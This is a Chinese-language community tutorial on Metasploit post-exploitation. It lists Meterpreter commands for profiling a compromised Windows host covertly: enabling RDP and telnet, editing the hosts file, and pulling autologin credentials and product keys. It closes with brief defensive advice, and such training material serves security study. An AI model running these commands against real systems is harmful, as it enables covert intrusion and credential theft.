Metasploit训练基础-后漏洞利用-了解目标对象
  TEZNKK3IfmPf 2023年11月14日 40 0


后漏洞利用也就是一旦获取了系统的访问控制权,我们的关注点就在于从系统中获取尽可能多的信息,同时不能被用户发现。

比如:windows注册表转存文件,密码散列转存文件、屏幕截图、以及音频记录等。收集敏感信息,对信息进行归档。


首先我们使用meterpreter会话,保持与目标系统的连接性


Metasploit训练基础-后漏洞利用-了解目标对象


1、收集操作系统信息


sysinfo


Metasploit训练基础-后漏洞利用-了解目标对象


2、查看当前进程


ps


Metasploit训练基础-后漏洞利用-了解目标对象


3、目标系统是否使用虚拟机


run checkvm


Metasploit训练基础-后漏洞利用-了解目标对象


4、目标系统是否正在运行


idletime


Metasploit训练基础-后漏洞利用-了解目标对象


5、获取目标系统环境变量


run get_env


Metasploit训练基础-后漏洞利用-了解目标对象


6、目标系统的网络信息


ipconfig


Metasploit训练基础-后漏洞利用-了解目标对象


7、目标系统的网络拓扑


route


Metasploit训练基础-后漏洞利用-了解目标对象


8、当前目标系统的防火墙设置


run getcountermeasure


Metasploit训练基础-后漏洞利用-了解目标对象


9、目标系统启用RDP远程桌面服务协议


run getgui -e


Metasploit训练基础-后漏洞利用-了解目标对象


Metasploit训练基础-后漏洞利用-了解目标对象


10、开启目标系统上的telnet服务协议


run gettelnet -e


Metasploit训练基础-后漏洞利用-了解目标对象


11、开启目标系统上的ssh服务协议


 
     


12、修改用户的host文件


run hostsedit -e 192.168.29.133,www.51cto.com


Metasploit训练基础-后漏洞利用-了解目标对象


13、当前登陆目标系统的用户


run enum_logged_on_user


Metasploit训练基础-后漏洞利用-了解目标对象


14、查看已经安装的应用软件


run get_application_list


Metasploit训练基础-后漏洞利用-了解目标对象


15、目标系统的驱动器信息(硬盘信息)


run windows/gather/forensics/enum_drives


Metasploit训练基础-后漏洞利用-了解目标对象


16、查看目标主机的产品密钥


run windows/gather/enum_ms_product_keys


Metasploit训练基础-后漏洞利用-了解目标对象


17、目标系统上的autologin特征


run windows/gather/credentials/windows_autologin


Metasploit训练基础-后漏洞利用-了解目标对象


18、转存目标系统的各种信息


run winenum


Metasploit训练基础-后漏洞利用-了解目标对象


19、转存目标系统的额外信息


run scraper


Metasploit训练基础-后漏洞利用-了解目标对象


Metasploit训练基础-后漏洞利用-了解目标对象


Metasploit训练基础-后漏洞利用-了解目标对象


防御措施


1、系统补丁应该及时打上

2、来源不明的链接,文档不能轻易打开

3、提升安全意识


【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2023年11月14日 0

暂无评论

推荐阅读
TEZNKK3IfmPf